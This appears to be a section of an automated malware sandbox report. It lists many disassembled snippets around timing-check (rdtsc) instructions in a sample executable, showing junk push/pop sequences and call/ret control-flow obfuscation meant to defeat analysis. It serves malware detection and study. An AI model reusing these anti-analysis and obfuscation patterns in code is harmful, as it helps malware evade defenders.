Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 36FAC7 second address: 36FAF3 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F3A94CD4076h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e jg 00007F3A94CD4082h 0x00000014 mov eax, dword ptr [eax] 0x00000016 push eax 0x00000017 push edx 0x00000018 jl 00007F3A94CD407Ch 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 36FAF3 second address: 36FAF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 36FAF7 second address: 36FB1C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A94CD407Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d pushad 0x0000000e js 00007F3A94CD407Ch 0x00000014 jg 00007F3A94CD4076h 0x0000001a pushad 0x0000001b pushad 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 36E38C second address: 36E3AD instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F3A9502B5F6h 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push ecx 0x0000000d push edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3772F8 second address: 377329 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F3A94CD4076h 0x00000008 jbe 00007F3A94CD4076h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jmp 00007F3A94CD4087h 0x00000015 popad 0x00000016 push ecx 0x00000017 push eax 0x00000018 push edx 0x00000019 jnc 00007F3A94CD4076h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 377329 second address: 37732D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3406C3 second address: 3406CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3406CB second address: 340708 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jo 00007F3A9502B5EAh 0x0000000b pushad 0x0000000c popad 0x0000000d push esi 0x0000000e pop esi 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F3A9502B5EFh 0x00000017 push ebx 0x00000018 jne 00007F3A9502B5E6h 0x0000001e jmp 00007F3A9502B5F4h 0x00000023 pop ebx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 376AE0 second address: 376AE4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 376AE4 second address: 376AEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 376DF3 second address: 376DFD instructions: 0x00000000 rdtsc 0x00000002 jo 00007F3A94CD4076h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 376DFD second address: 376E09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 376E09 second address: 376E0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 376E0D second address: 376E3D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jnl 00007F3A9502B600h 0x0000000e popad 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 push esi 0x00000013 pop esi 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 376E3D second address: 376E4D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007F3A94CD407Eh 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 376F90 second address: 376F96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 376F96 second address: 376F9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 376F9C second address: 376FBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F3A9502B5F8h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 376FBE second address: 376FD6 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F3A94CD4076h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jc 00007F3A94CD407Eh 0x00000010 js 00007F3A94CD4076h 0x00000016 push edx 0x00000017 pop edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3799A7 second address: 3799AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3799AD second address: 3799B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 379C60 second address: 379C66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 37A31A second address: 37A320 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 37A320 second address: 37A325 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 37A381 second address: 37A385 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 37A658 second address: 37A66E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jbe 00007F3A9502B5ECh 0x00000010 jng 00007F3A9502B5E6h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 37A6F3 second address: 37A6F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 37A6F8 second address: 37A70D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push esi 0x00000006 pop esi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jnl 00007F3A9502B5E6h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 37A70D second address: 37A711 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 37A711 second address: 37A717 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 37A717 second address: 37A725 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3A94CD407Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 37AE89 second address: 37AE8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 37AE8D second address: 37AF3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F3A94CD4084h 0x0000000b popad 0x0000000c mov dword ptr [esp], eax 0x0000000f call 00007F3A94CD4083h 0x00000014 mov di, dx 0x00000017 pop edi 0x00000018 movzx edi, ax 0x0000001b push 00000000h 0x0000001d call 00007F3A94CD407Ah 0x00000022 jmp 00007F3A94CD4081h 0x00000027 pop esi 0x00000028 jmp 00007F3A94CD4089h 0x0000002d push 00000000h 0x0000002f push 00000000h 0x00000031 push eax 0x00000032 call 00007F3A94CD4078h 0x00000037 pop eax 0x00000038 mov dword ptr [esp+04h], eax 0x0000003c add dword ptr [esp+04h], 0000001Ah 0x00000044 inc eax 0x00000045 push eax 0x00000046 ret 0x00000047 pop eax 0x00000048 ret 0x00000049 xchg eax, ebx 0x0000004a jmp 00007F3A94CD4085h 0x0000004f push eax 0x00000050 push eax 0x00000051 push edx 0x00000052 pushad 0x00000053 push eax 0x00000054 push edx 0x00000055 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 37AF3C second address: 37AF43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 37DFE7 second address: 37DFF5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pushad 0x0000000c popad 0x0000000d pop edi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 37DFF5 second address: 37E073 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A9502B5F8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push edi 0x0000000d call 00007F3A9502B5E8h 0x00000012 pop edi 0x00000013 mov dword ptr [esp+04h], edi 0x00000017 add dword ptr [esp+04h], 0000001Dh 0x0000001f inc edi 0x00000020 push edi 0x00000021 ret 0x00000022 pop edi 0x00000023 ret 0x00000024 mov dword ptr [ebp+122D1CD2h], edi 0x0000002a push 00000000h 0x0000002c cld 0x0000002d push 00000000h 0x0000002f push 00000000h 0x00000031 push ecx 0x00000032 call 00007F3A9502B5E8h 0x00000037 pop ecx 0x00000038 mov dword ptr [esp+04h], ecx 0x0000003c add dword ptr [esp+04h], 00000014h 0x00000044 inc ecx 0x00000045 push ecx 0x00000046 ret 0x00000047 pop ecx 0x00000048 ret 0x00000049 mov si, dx 0x0000004c push eax 0x0000004d push eax 0x0000004e push edx 0x0000004f jmp 00007F3A9502B5EFh 0x00000054 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 37E073 second address: 37E078 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 37E078 second address: 37E07E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 37EB74 second address: 37EC10 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A94CD407Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push edx 0x0000000f call 00007F3A94CD4078h 0x00000014 pop edx 0x00000015 mov dword ptr [esp+04h], edx 0x00000019 add dword ptr [esp+04h], 0000001Ch 0x00000021 inc edx 0x00000022 push edx 0x00000023 ret 0x00000024 pop edx 0x00000025 ret 0x00000026 mov esi, 07CCD72Bh 0x0000002b push 00000000h 0x0000002d push 00000000h 0x0000002f push eax 0x00000030 call 00007F3A94CD4078h 0x00000035 pop eax 0x00000036 mov dword ptr [esp+04h], eax 0x0000003a add dword ptr [esp+04h], 0000001Dh 0x00000042 inc eax 0x00000043 push eax 0x00000044 ret 0x00000045 pop eax 0x00000046 ret 0x00000047 call 00007F3A94CD407Bh 0x0000004c mov dword ptr [ebp+122D20B7h], esi 0x00000052 pop esi 0x00000053 mov dword ptr [ebp+122D2F63h], ebx 0x00000059 push 00000000h 0x0000005b mov dword ptr [ebp+122D2ED4h], eax 0x00000061 xchg eax, ebx 0x00000062 push eax 0x00000063 push edx 0x00000064 jmp 00007F3A94CD4087h 0x00000069 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 37E989 second address: 37E997 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 37EC10 second address: 37EC15 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 380A38 second address: 380AD2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jp 00007F3A9502B5E6h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f mov dword ptr [ebp+12453EBEh], ebx 0x00000015 mov dword ptr [ebp+122D29C3h], edx 0x0000001b push 00000000h 0x0000001d push 00000000h 0x0000001f push esi 0x00000020 call 00007F3A9502B5E8h 0x00000025 pop esi 0x00000026 mov dword ptr [esp+04h], esi 0x0000002a add dword ptr [esp+04h], 00000017h 0x00000032 inc esi 0x00000033 push esi 0x00000034 ret 0x00000035 pop esi 0x00000036 ret 0x00000037 mov dword ptr [ebp+124553D3h], edi 0x0000003d push 00000000h 0x0000003f push 00000000h 0x00000041 push ebx 0x00000042 call 00007F3A9502B5E8h 0x00000047 pop ebx 0x00000048 mov dword ptr [esp+04h], ebx 0x0000004c add dword ptr [esp+04h], 0000001Dh 0x00000054 inc ebx 0x00000055 push ebx 0x00000056 ret 0x00000057 pop ebx 0x00000058 ret 0x00000059 jmp 00007F3A9502B5F8h 0x0000005e jmp 00007F3A9502B5EBh 0x00000063 xchg eax, ebx 0x00000064 push eax 0x00000065 push edx 0x00000066 jmp 00007F3A9502B5EBh 0x0000006b rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 380AD2 second address: 380AD8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 380AD8 second address: 380ADC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 37FCFD second address: 37FD03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 37FD03 second address: 37FD07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 37FD07 second address: 37FD0B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 381598 second address: 38159C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 37FD0B second address: 37FD3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jno 00007F3A94CD407Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F3A94CD4089h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 38159C second address: 3815A6 instructions: 0x00000000 rdtsc 0x00000002 je 00007F3A9502B5E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3815A6 second address: 3815AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3815AC second address: 3815B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3815B0 second address: 3815B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3815B4 second address: 38160E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b jmp 00007F3A9502B5F1h 0x00000010 jns 00007F3A9502B5E6h 0x00000016 push 00000000h 0x00000018 mov esi, dword ptr [ebp+122D1BFBh] 0x0000001e push 00000000h 0x00000020 push 00000000h 0x00000022 push edx 0x00000023 call 00007F3A9502B5E8h 0x00000028 pop edx 0x00000029 mov dword ptr [esp+04h], edx 0x0000002d add dword ptr [esp+04h], 00000019h 0x00000035 inc edx 0x00000036 push edx 0x00000037 ret 0x00000038 pop edx 0x00000039 ret 0x0000003a push eax 0x0000003b push eax 0x0000003c push edx 0x0000003d pushad 0x0000003e pushad 0x0000003f popad 0x00000040 jc 00007F3A9502B5E6h 0x00000046 popad 0x00000047 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 385120 second address: 385124 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 381E9B second address: 381EA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F3A9502B5E6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 385124 second address: 38512A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 38661B second address: 38661F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3857EE second address: 3857F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 38661F second address: 386625 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3857F4 second address: 3857F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3857F8 second address: 38589A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a je 00007F3A9502B5E8h 0x00000010 push edx 0x00000011 pop edx 0x00000012 jg 00007F3A9502B5E8h 0x00000018 pushad 0x00000019 popad 0x0000001a popad 0x0000001b nop 0x0000001c jmp 00007F3A9502B5EDh 0x00000021 push dword ptr fs:[00000000h] 0x00000028 movzx edi, cx 0x0000002b mov dword ptr fs:[00000000h], esp 0x00000032 mov dword ptr [ebp+122D2E7Ch], ebx 0x00000038 mov eax, dword ptr [ebp+122D1005h] 0x0000003e push 00000000h 0x00000040 push ebx 0x00000041 call 00007F3A9502B5E8h 0x00000046 pop ebx 0x00000047 mov dword ptr [esp+04h], ebx 0x0000004b add dword ptr [esp+04h], 0000001Ch 0x00000053 inc ebx 0x00000054 push ebx 0x00000055 ret 0x00000056 pop ebx 0x00000057 ret 0x00000058 mov edi, dword ptr [ebp+122D2C82h] 0x0000005e push FFFFFFFFh 0x00000060 add bl, 0000001Ch 0x00000063 nop 0x00000064 pushad 0x00000065 jmp 00007F3A9502B5F7h 0x0000006a push eax 0x0000006b push edx 0x0000006c jmp 00007F3A9502B5F2h 0x00000071 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3867E4 second address: 3867F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3A94CD407Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3867F4 second address: 3867F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3867F8 second address: 38680B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c jg 00007F3A94CD4076h 0x00000012 pop edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 38680B second address: 386827 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3A9502B5F8h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 388738 second address: 38873C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 38873C second address: 388742 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3877ED second address: 3877F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3877F1 second address: 3877F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3877F5 second address: 387818 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jp 00007F3A94CD4089h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 387818 second address: 387901 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A9502B5F8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push ecx 0x0000000d call 00007F3A9502B5E8h 0x00000012 pop ecx 0x00000013 mov dword ptr [esp+04h], ecx 0x00000017 add dword ptr [esp+04h], 00000018h 0x0000001f inc ecx 0x00000020 push ecx 0x00000021 ret 0x00000022 pop ecx 0x00000023 ret 0x00000024 movzx edi, dx 0x00000027 mov dword ptr [ebp+124553B9h], ebx 0x0000002d cmc 0x0000002e push dword ptr fs:[00000000h] 0x00000035 mov dword ptr [ebp+122D2EBCh], eax 0x0000003b stc 0x0000003c mov dword ptr fs:[00000000h], esp 0x00000043 mov ebx, dword ptr [ebp+122D2C76h] 0x00000049 mov eax, dword ptr [ebp+122D0189h] 0x0000004f push 00000000h 0x00000051 push ebp 0x00000052 call 00007F3A9502B5E8h 0x00000057 pop ebp 0x00000058 mov dword ptr [esp+04h], ebp 0x0000005c add dword ptr [esp+04h], 0000001Dh 0x00000064 inc ebp 0x00000065 push ebp 0x00000066 ret 0x00000067 pop ebp 0x00000068 ret 0x00000069 call 00007F3A9502B5F0h 0x0000006e jmp 00007F3A9502B5F9h 0x00000073 pop ebx 0x00000074 push FFFFFFFFh 0x00000076 mov ebx, dword ptr [ebp+122D2381h] 0x0000007c nop 0x0000007d jl 00007F3A9502B5FAh 0x00000083 jmp 00007F3A9502B5F4h 0x00000088 push eax 0x00000089 push eax 0x0000008a push edx 0x0000008b jns 00007F3A9502B5ECh 0x00000091 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3896A1 second address: 3896C0 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F3A94CD407Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jc 00007F3A94CD407Ch 0x00000013 jg 00007F3A94CD4076h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3889BF second address: 3889C5 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 38A7C5 second address: 38A7CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 38984F second address: 389853 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 389853 second address: 389859 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
